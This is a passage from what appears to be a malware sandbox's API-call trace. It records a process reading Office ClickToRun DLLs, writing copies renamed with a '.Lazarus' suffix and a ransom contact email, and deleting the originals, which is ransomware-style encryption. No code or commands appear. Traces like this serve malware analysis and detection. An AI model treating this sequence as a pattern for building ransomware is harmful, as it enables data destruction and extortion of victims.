lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.370] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.371] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.371] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.371] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.371] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0xea0, lpOverlapped=0x0) returned 1 [0091.371] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.371] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0091.371] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327ef70*=0xea0, lpOverlapped=0x0) returned 1 [0091.372] CloseHandle (hObject=0x33c) returned 1 [0091.387] CloseHandle (hObject=0x418) returned 1 [0091.387] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.392] GetFileType (hFile=0x418) returned 0x1 [0091.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0091.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0091.393] GetLastError () returned 0xb7 [0091.393] SetLastError (dwErrCode=0xb7) [0091.393] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0091.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0091.403] CloseHandle (hObject=0x418) returned 1 [0091.404] AreFileApisANSI () returned 1 [0091.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8d028 [0091.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8d028, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 78 [0091.404] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll")) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0091.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.405] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb5e67000, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x73aa0, dwReserved0=0x1, dwReserved1=0x0, cFileName="AppvIsvStream64.dll", cAlternateFileName="APPVIS~3.DLL")) returned 1 [0091.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0091.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0091.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0091.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.406] AreFileApisANSI () returned 1 [0091.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll", lpUsedDefaultChar=0x0) returned 78 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0091.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.407] AreFileApisANSI () returned 1 [0091.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8d028 [0091.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8d028, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 78 [0091.407] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.407] GetFileType (hFile=0x418) returned 0x1 [0091.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0091.407] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0091.408] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0091.408] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0091.408] CloseHandle (hObject=0x418) returned 1 [0091.408] AreFileApisANSI () returned 1 [0091.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8d370 [0091.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8d370, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 78 [0091.408] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.409] GetFileType (hFile=0x418) returned 0x1 [0091.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0091.409] CloseHandle (hObject=0x418) returned 1 [0091.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0091.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0091.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0091.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0091.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0091.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0091.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0091.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0091.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.412] AreFileApisANSI () returned 1 [0091.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c7a0 [0091.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 78 [0091.412] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb5e67000, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x73aa0)) returned 1 [0091.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0091.413] AreFileApisANSI () returned 1 [0091.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0091.413] GetLastError () returned 0x0 [0091.413] SetLastError (dwErrCode=0x0) [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0091.413] GetLastError () returned 0x0 [0091.413] SetLastError (dwErrCode=0x0) [0091.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a238 [0091.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0091.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0091.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0091.414] AreFileApisANSI () returned 1 [0091.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a238, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 140 [0091.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x118) returned 0x92138 [0091.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a238, cbMultiByte=-1, lpWideCharStr=0x92138, cchWideChar=140 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 140 [0091.414] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.415] GetFileType (hFile=0x418) returned 0x1 [0091.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92138 | out: hHeap=0x20000) returned 1 [0091.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0091.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0091.415] AreFileApisANSI () returned 1 [0091.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8ca40 [0091.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8ca40, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 78 [0091.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.416] GetFileType (hFile=0x33c) returned 0x1 [0091.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0091.416] RtlAllocateHeap (HeapHandle=0x20000, 